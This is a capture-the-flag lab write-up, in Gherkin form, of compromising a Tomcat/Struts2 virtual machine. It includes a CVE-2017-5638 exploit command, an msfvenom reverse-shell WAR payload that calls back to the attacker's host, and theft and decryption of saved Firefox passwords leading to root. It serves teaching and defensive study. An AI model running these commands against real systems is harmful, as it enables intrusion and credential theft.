## Version 1.4.1
## language: en

Feature:
  TOE:
    money-box
  Category:
    Improper Neutralization
  Location:
    http://192.168.103.4:8080/struts2-showcase/index.action
  CWE:
    CWE-20: Improper Input Validation
  Rule:
    REQ.266: https://fluidattacks.com/products/rules/list/266
  Goal:
    Get remote connection and root privileges
  Recommendation:
    It’d better disable all the insecure functions in the tools using for
    the system

  Background:
  Hacker's software:
    | <Software name>            | <Version>|
    | Kali Linux                 | 2020.4   |
    | Mozilla Firefox            | 78.3.0   |
    | netcat                     | 1.10     |
    | msfvenom                   | 4.11.4   |
    | Nmap                       | 7.91     |
    | searhsploit                | 3.8.8    |
    | Firepwd                    | 1.0      |
    | Gobuster                   | 3.0.1    |

  TOE information:
    Given a .OVA file
    When I saw its extension
    Then I executed it on vimware
    Then I saw that the machine was running ubuntu [evidence](01.png)
    Then I verified which IP was assigned to me by dhcp server with the command
    """
    ip add show vmnet8
    """
    And I got the next result
    """
    vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state
    UNKNOWN group default qlen 1000
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
    inet 192.168.103.1/29 brd 192.168.103.7 scope global vmnet8
    valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fec0:8/64 scope link
    valid_lft forever preferred_lft forever
    """
    And I scanned the network using nmap with the next command
    """
    nmap -sP 192.168.103.0/29
    """
    And I got the next result
    """
    Nmap scan report for 192.168.103.1
    Host is up (0.00076s latency).
    Nmap scan report for 192.168.103.4
    Host is up (0.00043s latency).
    """
    Then I knew that 192.168.103.4 was the target machine's IP address
    And I used nmap again to know which ports were opened with the command
    """
    nmap -sV 192.168.103.4
    """
    And I got the next result
    """
    Nmap scan report for 192.168.103.4
    Host is up (0.00040s latency).
    Not shown: 998 closed ports
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 7.2p2
    Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
    8080/tcp open  http    Apache Tomcat 9.0.40
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    """
    Then I noted that port 22 was used by SSH in its version 2.0
    And HTTP was running on port 8080
    And it was using apache tomcat in its version 9.0.40

  Scenario: Normal use case
    Given HTTP was working on port 8080
    Then I accessed to the main webpage on 192.168.103.4:8080 using browser
    And thus I could see it [evidence](02.png)

  Scenario: Static detection
    Given I didn't have access to the source code
    Then I couldn't do this detection

  Scenario: Dynamic detection
    Given I didn't found out any wrong
    When I was analyzing the web server
    Then I decided to search possible hidden directories with gobuster
    Then I executed the below command
    """
    gobuster dir -u http://192.168.103.4:8080/ -w /usr/share/seclists/Discovery
    /Web-Content/tomcat.txt -x php,txt,html -s 200,204,301,302,307,401
    """
    And thus I got the next output
    """
    ===============================================================
    Gobuster v3.1.0
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://192.168.103.4:8080/
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/
    tomcat.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.1.0
    [+] Extensions:              html,php,txt
    [+] Timeout:                 10s
    ===============================================================
    2021/03/18 17:32:44 Starting gobuster in directory enumeration mode
    ===============================================================
    /examples             (Status: 302) [Size: 0] [--> /examples/]
    /examples/../manager/html (Status: 401) [Size: 669]
    /host-manager         (Status: 302) [Size: 0] [--> /host-manager/]
    /host-manager/add     (Status: 403) [Size: 3022]
    /host-manager/stop.txt (Status: 403) [Size: 3022]
    /host-manager/stop.html (Status: 403) [Size: 3022]
    /host-manager/start   (Status: 403) [Size: 3022]
    /host-manager/start.txt (Status: 403) [Size: 3022]
    /manager/html         (Status: 401) [Size: 669]
    /manager/html/*.txt   (Status: 401) [Size: 669]
    /manager              (Status: 302) [Size: 0] [--> /manager/]
    /manager/html/*       (Status: 401) [Size: 669]
    /examples/servlets/index.html (Status: 200) [Size: 6596]
    /examples/jsp/index.html (Status: 200) [Size: 14245]
    /manager/html/*.html  (Status: 401) [Size: 669]
    /manager/jmxproxy     (Status: 401) [Size: 669]
    /manager/status.xsd   (Status: 200) [Size: 4374]
    /examples/jsp/snp/snoop.jsp (Status: 200) [Size: 585]
    /examples/jsp/snp/snoop.jsp.html (Status: 200) [Size: 2262]
    ===============================================================
    2021/03/18 17:32:45 Finished
    ===============================================================
    """
    Then I entered to some of those directories
    And I found something interesting in the host-manager directory
    And I used those credential to login me [evidence](03.png)
    And it didn't work
    Then I searched about some vulnerabilities in that version of tomcat
    Then I found about the cve-2017-5638 vulnerability
    And thus I could see the mentioned vulnerability in the address below
    """
    http://192.168.103.4:8080/struts2-showcase/index.action
    """
    Then I scanned that directory with gobuster
    """
    gobuster dir -u http://192.168.103.4:8080/struts2-showcase/showcase.action
    -w /usr/share/seclists/Discovery/Web-Content/raf-large-words.txt -x php,txt
    -s 200,204,301,302,307,401
    """
    And thus I got the next result
    """
    ===============================================================
    Gobuster v3.1.0
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://192.168.103.4:8080/struts2-showcase/
    showcase.action
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                /usr/share/seclists/Discovery/Web-Content
    /raft-large-words.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.1.0
    [+] Extensions:              txt,html,php
    [+] Timeout:                 10s
    ===============================================================
    2021/03/18 10:36:51 Starting gobuster in directory enumeration mode
    ===============================================================
    /date                 (Status: 200) [Size: 12228]
    /tree                 (Status: 500) [Size: 12521]
    /.vm                  (Status: 200) [Size: 3484]
    /toggle               (Status: 500) [Size: 12521]
    /Test3                (Status: 500) [Size: 12521]
    /example4             (Status: 500) [Size: 6210]
    /example5             (Status: 500) [Size: 11519]
    ===============================================================
    2021/03/18 10:43:38 Finished
    ===============================================================
    """
    When I analyzed the previous output
    Then I accessed to those directories but I didn't found any relevant
    Then I search an exploit for that vulnerability with searchsploit
    """
    -------------------------------------------- -------------------------
    Exploit Title                              |  Path
    -------------------------------------------- -------------------------
    Apache Struts 2 - DefaultActionMapper Prefi| java/webapps/48917.py
    Apache Struts 2 - DefaultActionMapper Prefi| multiple/remote/27135.rb
    Apache Struts 2 - Namespace Redirect OGNL I| multiple/remote/45367.rb
    Apache Struts 2 - Skill Name Remote Code Ex| multiple/remote/37647.txt
    Apache Struts 2 - Struts 1 Plugin Showcase | multiple/remote/44643.rb
    Apache Struts 2 < 2.3.1 - Multiple Vulnerab| multiple/webapps/18329.txt
    Apache Struts 2.0 - 'XSLTResult.java' Arbit| java/webapps/37009.xml
    Apache Struts 2.0.0 < 2.2.1.1 - XWork 's:su| multiple/remote/35735.txt
    Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10| linux/webapps/41570.py
    """
    Then I used the last of them
    Then I searched the file mentioned previously [evidence](04.png)
    And I executed the following command for that
    """
    python 41570.py http://192.168.103.4:8080/struts2-showcase/index.action
    "locate tomcat-users.xml"
    """
    Then I got the following result
    """
    /usr/local/tomcat/conf/tomcat-users.xml
    """
    Then I accessed to that file
    And there I could see the user and password to login me [evidence](05.png)
    Then I logged me in the web server with the found credentials
    And thus I accessed to the manager panel [evidence](06.png)
    Then I inspected that panel
    And There I found a menu to upload a war file
    Then I did a payload using msfvenom with the command below
    """
    msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.103.1 LPORT=1234
    -f war > shell.war
    """
    Then I uploaded that file to the web server [evidence](07.png)
    And thus I could see the uploaded file inside the application menu
    Then I put the port 1234 in listening mode using netcat

  Scenario: Exploitation
    Given previously I'd put the port 1234 in listening mode
    Then I clicked on the file uploaded previously [evidence](08.png)
    And in that way I got remote connection
    Then I listed the files in the directory
    """
    drwxr-xr-x 2 minhtuan minhtuan 4096 Dec  6 22:01 Desktop
    drwxr-xr-x 2 minhtuan minhtuan 4096 Dec  6 22:01 Documents
    drwxr-xr-x 2 minhtuan minhtuan 4096 Dec  6 22:01 Downloads
    drwxr-xr-x 2 minhtuan minhtuan 4096 Dec  6 22:01 Music
    drwxrwxr-x 4 minhtuan minhtuan 4096 Dec  6 18:46 myWebApp
    drwxr-xr-x 2 minhtuan minhtuan 4096 Dec  6 22:01 Pictures
    drwxr-xr-x 2 minhtuan minhtuan 4096 Dec  6 22:01 Public
    drwxr-xr-x 6 minhtuan minhtuan 4096 Jan 27  2017 struts2
    drwxr-xr-x 2 minhtuan minhtuan 4096 Dec  6 22:01 Templates
    -rw-r--r-- 1 minhtuan minhtuan   90 Dec  6 22:24 user.txt
    -rw-r----- 1 minhtuan minhtuan  800 Mar 18 07:37 velocity.log
    drwxr-xr-x 2 minhtuan minhtuan 4096 Dec  6 22:01 Videos
    """
    Then I inspected the user.txt file
    And there I found the following message
    """
    Try your best, you have passed the first challenge,
    and the last one is for you, root me!
    """
    Then I searched in the home directory other users
    And I didn't find other of them
    Then I got back to the previous directory
    And I checked the .bash_history file [evidence](09.png)
    Then I noted that someone was accessed to the next directory
    """
    .mozilla/firefox/
    """
    Then I entered to the fvbljmev.default-release directory
    And There I found the next files
    """
    -rw-------  1 minhtuan minhtuan  294912 Dec  6 22:02 key4.db
    -rw-------  1 minhtuan minhtuan     660 Dec  6 22:02 logins
    """
    Then I found that with those files it was posible to get the saved password
    Then I copied those files to the /usr/local/tomcat/webapps/docs directory
    And I downloaded them key4.db file
    """
    wget http://192.168.103.4:8080/docs/key4.db
    --2021-03-18 16:16:28--  http://192.168.103.4:8080/docs/key4.db
    Connecting to 192.168.103.4:8080... connected.
    HTTP request sent, awaiting response... 200
    Length: 294912 (288K)
    Saving to: ‘key4.db’
    key4.db  100%[==================>] 288.00K  --.-KB/s    in 0.01s
    2021-03-18 16:16:28 (23.6 MB/s) - ‘key4.db’ saved [294912/294912]
    """
    Then I downloaded the logins file
    """
    --2021-03-18 16:16:28--  http://192.168.103.4:8080/docs/logins
    Connecting to 192.168.103.4:8080... connected.
    HTTP request sent, awaiting response... 200
    Length: 294912 (288K)
    Saving to: ‘logins’
    key4.db  100%[==================>] 660.00K  --.-KB/s    in 0.01s
    2021-03-18 16:20:28 (33.4 MB/s) - ‘logins’ saved [660/660]
    """
    Then I used the Firepwd tool to get the password
    And thus I could see the password for the twitter account
    """
    clearText
    b'540b76c41a46b9dcecc4c15449c785011546bcf84cfe9b700808080808080808'
    decrypting login/password pairs
    https://twitter.com:b'minhtuan',b'skysayohyeah'
    """
    Then I used those credentials to log me through SSH
    And it worked successfully as it can see in [evidence](10.png)
    Then I listed the user permissions
    And in that way I noted that I could executed commands as the root user
    """
    Matching Defaults entries for minhtuan on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\
    :/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    User minhtuan may run the following commands on ubuntu:
    (ALL : ALL) ALL
    """
    Then I listed the files in the root directory
    Then I visualized the flag and solved the challenge [evidence](11.png)

  Scenario: Remediation
    Given the system vulnerable to a remote code execution attack
    And it doesn't validate that the uploaded files doesn't have malicious code
    And the same password is used for different purposes
    Then it'd better disable the parts of the system which generate threats
    And validate that the uploaded file didn't have malicious code
    And use different passwords for different accounts and purposes

  Scenario: Scoring
   Base: Attributes that are constants over time and organizations
     7.9/10 (High) - AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H/
   Temporal: Attributes that measure the exploit's popularity and fixability
     7.8/10 (High) - E:H/RL:O/RC:C/
   Environmental: Unique and relevant attributes to a specific user environment
     7.9/10 (High) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found until date 2021-03-19
